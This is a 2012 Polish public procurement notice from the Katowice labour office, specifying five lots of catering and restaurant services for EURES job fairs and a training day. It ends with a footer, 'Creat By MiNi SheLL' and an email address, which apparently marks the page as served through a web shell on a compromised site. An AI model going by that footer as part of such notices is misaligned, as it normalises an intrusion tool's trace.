<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Grant Eures.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ ORAZ RESTAURACYJNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I 

Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców ( 200 osób) podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w KATOWICACH w dniu 11.10.2012 r. 
Na usługę składać się będą:
1. Napoje: 
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń.
- woda mineralna niegazowana (80 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (80 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (100 porcji x 200 ml), jabłkowy (100 porcji x 200 ml), z czarnej porzeczki (100 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 400 sztuk):
- z szynką i pomidorkiem (80 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (80 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (80 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (80 szt. x 40 g); 
- z ementalerem, ogórkiem konserwowym i papryką konserwową (80 szt. x 40 g);
3. Świeże owoce podawane na paterach:
- jabłka - 2 kg
- banany - 1,5 kg
- winogrona (zielone, czarne) - łącznie 3 kg
- mandarynki - 2 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem brzoskwinią (150 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (150 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę z każdego rodzaju.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (50 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (50 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (50 szt.)
- roladki naleśnikowe z nadzieniem z łososia i szpinakiem (50 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 100 szt.)
6. Sałatki - 2 rodzaje:
- sałatka nicejska z tuńczykiem (120 porcji x 100 g)
- sałatka Cezar z kurczakiem grillowanym, parmezanem i grzankami (120 porcji x 100 g),
7. Ciepły posiłek podany w podgrzewaczach:
- bogracz lub strogonow lub gulasz (120 porcji x 200 ml),
- pierogi mieszane - ruskie, z mięsem, z kapustą i grzybami, ze szpinakiem (razem 120 porcji x 200 g)    
- pieczywo mieszane - białe, ciemne (120 porcji x 50 g). 

8. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
9. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
10. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 16:00).
11. Transport. 
Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów - budynku Śląskiego Urzędu Wojewódzkiego mieszczącego się przy ul. Jagiellońskiej 25 w Katowicach (Sala Beskidzka).
Napoje (poz. 1), kanapki bankietowe (poz. 2), świeże owoce (poz. 3), wyroby cukiernicze (poz. 4) powinny zostać dostarczone do godz. 9:00.
Przekąski koktajlowe (poz. 5), sałatki (poz. 6) i ciepły posiłek podawany w podgrzewaczach (poz. 7) powinny zostać dostarczone na godz. 13:30. 
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 100 butelek (500 ml) wody mineralnej gazowanej,
- 150 butelek (500 ml) wody mineralnej niegazowanej,
- 200 kubeczków jednorazowych,
- słone paluszki (80 opakowań po min. 70g).

Produkty do rozłożenia na stoiskach targowych należy dostarczyć do godz. 8:00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ ORAZ RESTAURACYJNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II 

Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców ( 80 osób) podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w CZĘSTOCHOWIE w dniu 11.10.2012 r. 
Na usługę składać się będą:
1. Napoje: 
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń.
- woda mineralna niegazowana (50 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (40 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (40 porcji x 200 ml), jabłkowy (40 porcji x 200 ml), z czarnej porzeczki (40 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 200 sztuk):
- z szynką i pomidorkiem (40 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (40 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (40 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (40 szt. x 40 g); 
- z ementalerem, ogórkiem konserwowym i papryką konserwową (40 szt. x 40 g).
3. Świeże owoce podawane na paterach:
- jabłka - 1 kg
- banany - 1 kg
- winogrona (zielone, czarne) - łącznie 1,5 kg
- mandarynki - 1 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem brzoskwinią (60 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (60 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę z każdego rodzaju.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (40 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (40 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (40 szt.)
- roladki naleśnikowe z nadzieniem z łososia i szpinakiem (40 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 80 szt.)
6. Sałatki - 2 rodzaje:
- sałatka nicejska z tuńczykiem (60 porcji x 100 g)
- sałatka Cezar z kurczakiem grillowanym, parmezanem i grzankami (60 porcji x 100 g),
7. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
8. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
9. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 16:00).
10. Transport. 

Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów - budynku Częstochowskiego Parku Przemysłowo - Technologicznego mieszczącego się przy ul. Wały Dwernickiego 117/121.
Napoje (poz. 1), kanapki bankietowe (poz. 2), świeże owoce (poz. 3), wyroby cukiernicze (poz. 4) powinny zostać dostarczone do godz. 9:00.
Przekąski koktajlowe (poz. 5) i sałatki (poz. 6) powinny zostać dostarczone na godz. 13:30. 
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 40 butelek (500 ml) wody mineralnej gazowanej,
- 40 butelek (500 ml) wody mineralnej niegazowanej,
- 80 kubeczków jednorazowych,
- słone paluszki (40 opakowań po min. 70g).
Produkty do rozłożenia na stoiskach targowych należy dostarczyć do godz. 8:00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ ORAZ RESTAURACYJNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ III 

Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (80 osób) podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w BIELSKU - BIAŁEJ w dniu 11.10.2012 r. 

Na usługę składać się będą:
1. Napoje: 
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń.
- woda mineralna niegazowana (50 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (40 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (40 porcji x 200 ml), jabłkowy (40 porcji x 200 ml), z czarnej porzeczki (40 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 200 sztuk):
- z szynką i pomidorkiem (40 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (40 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (40 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (40 szt. x 40 g); 
- z ementalerem, ogórkiem konserwowym i papryką konserwową (40 szt. x 40 g).
3. Świeże owoce podawane na paterach:
- jabłka - 1 kg
- banany - 1 kg
- winogrona (zielone, czarne) - łącznie 1,5 kg
- mandarynki - 1 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem brzoskwinią (60 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (60 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę z każdego rodzaju.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (40 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (40 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (40 szt.)
- roladki naleśnikowe z nadzieniem z łososia i szpinakiem (40 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 80 szt.)

6. Sałatki - 2 rodzaje:
- sałatka nicejska z tuńczykiem (60 porcji x 100 g)
- sałatka Cezar z kurczakiem grillowanym, parmezanem i grzankami (60 porcji x 100 g),

7. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
8. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
9. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 16:00).
10. Transport. 
Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów -budynku Bielskiego Centrum Kształcenia Ustawicznego i Praktycznego mieszczącego się przy ul. Piastowskiej 21.
Napoje (poz. 1), kanapki bankietowe (poz. 2), świeże owoce (poz. 3), wyroby cukiernicze (poz. 4) powinny zostać dostarczone do godz. 9:00.
Przekąski koktajlowe (poz. 5) i sałatki (poz. 6) powinny zostać dostarczone na godz. 13:30.
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 40 butelek (500 ml) wody mineralnej gazowanej,
- 40 butelek (500 ml) wody mineralnej niegazowanej,
- 80 kubeczków jednorazowych,
- słone paluszki (40 opakowań po min. 70g).
Produkty do rozłożenia na stoiskach targowych należy dostarczyć do godz. 8:00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ ORAZ RESTAURACYJNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ IV

Przedmiotem zamówienia jest świadczenie usługi restauracyjnej  (kolacja) w formie bufetu szwedzkiego wydana w lokalu, który zapewni Wykonawca, w dniu 10.10.2012 r. od godz. 18:00. dla 20 gości zagranicznych i wystawców biorących udział w Europejskich Targach Przedsiębiorczości, Pracy i Edukacji w Katowicach oraz przedstawicieli organizatora. 
Restauracja , w której świadczona będzie usługa powinna:
- być zlokalizowana w sąsiedztwie siedziby Zamawiającego i miejsca odbywania Targów, rozumianym jako obszar ograniczony następującymi ulicami: 
-od północy, ulicą Andrzeja od skrzyżowania z ulica Mikołowską, następnie ulicą T. Kościuszki przechodzącą w ulicę M. Konopnickiej i ulicą Wojewódzką do skrzyżowania z ulicą J. Lompy, 
-od wschodu, ulicą J. Lompy od skrzyżowania z ulicą Wojewódzką do wjazdu na Aleję Górnośląską,  
- od południa, Aleją Górnośląską od wjazdu od strony ulicy Lompy do skrzyżowania z ulicą Mikołowską, 
*od zachodu, ulicą Mikołowską od skrzyżowania z Aleją Górnośląską do skrzyżowania z ulicą Andrzeja, 
- dysponować wyodrębnioną salą zdolną pomieścić ok. 20 gości (przy stołach ustawionych w kształcie litery U lub w kształcie prostokąta), która będzie udostępniona do wyłącznej dyspozycji Zamawiającego od godz. 18:00 do ok. godz. 23:00. 
Na usługę składać się będą:
- 3 rodzaje przystawek (pieczarki faszerowane z szynką lub ziołami, carpaccio z polędwicy wołowej lub łososia, paluszki serowe panierowane z sosem musztardowo-miodowym), 
- 3 rodzaje zup (cebulowa z grzankami i serem, krem z borowików, żurek z białą kiełbasą i jajkiem), 
- 3 dania główne (kieszonka z kurczaka nadziewana serem, makaron penne ze szpinakiem 
i suszonymi pomidorami, dorsz w koszulce z masłem koperkowym)
- dodatki: grillowane warzywa (bakłażan, cukinia, marchew, cebula, papryka), zestaw surówek, ryż, zapiekane ziemniaki, 
- deser: ciasto domowe z owocami, świeże owoce, 
- napoje: woda mineralna, soki (jabłkowy, z czarnej porzeczki), kawa, herbata, 1 lampka wina
- zimna płyta: wędliny, drobne przekąski typu tymbaliki, koreczki, kanapki bankietowe, 2 rodzaje sałatek, świeże i marynowane warzywa, pieczywo, masło.
- obsługa kelnerska przez cały czas trwania kolacji, przy czym przynajmniej jedna osoba z obsługi kelnerskiej powinno posługiwać się językiem angielskim w stopniu minimum komunikatywnym.     
Ponadto Wykonawca powinien zapewnić odpowiedni wystrój sali (dekoracje stołów, obrusy materiałowe, dopasowane serwetki papierowe). 
Wykonawca zobowiązany jest podać w ofercie nazwę oraz adres restauracji, w której świadczona będzie usługa restauracyjna.
Ostateczna liczba uczestników zostanie przekazana Wykonawcy na 2 dni robocze przed wykonaniem usługi, przy czym z usługi restauracyjnej korzystać będzie nie mniej niż 15 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.53.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ ORAZ RESTAURACYJNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ V 

Przedmiotem zamówienia jest świadczenie usługi cateringowej dla uczestników  szkolenia dla pracowników powiatowych urzędów pracy z województwa śląskiego z zakresu koordynacji systemów zabezpieczenia społecznego (40 osób) w KATOWICACH w dniu 18.10.2012 r.
Na usługę składać się będą:
1. Napoje: 
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń.
- woda mineralna niegazowana (25 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy i jabłkowy lub z czarnej porzeczki (po 2 litry z każdego rodzaju), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 120 sztuk):
- z szynką i pomidorkiem (30 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (30 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (30 szt. x 40 g); 
- z rostbefem pieczonym i sosem tatarskim (30 szt. x 40 g).
3. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (30 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (30 porcji x 65 g),  
4. Przekąski słone:
- mix przekąsek: paluszki, krakersy, precelki - 50g różnych przekąsek / osoba

5. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
6. Dekoracja stołów (obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
7. Transport. 

Catering powinien być dostarczony do siedziby Zamawiającego do godz. 9:00 (II piętro, sala nr 221)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com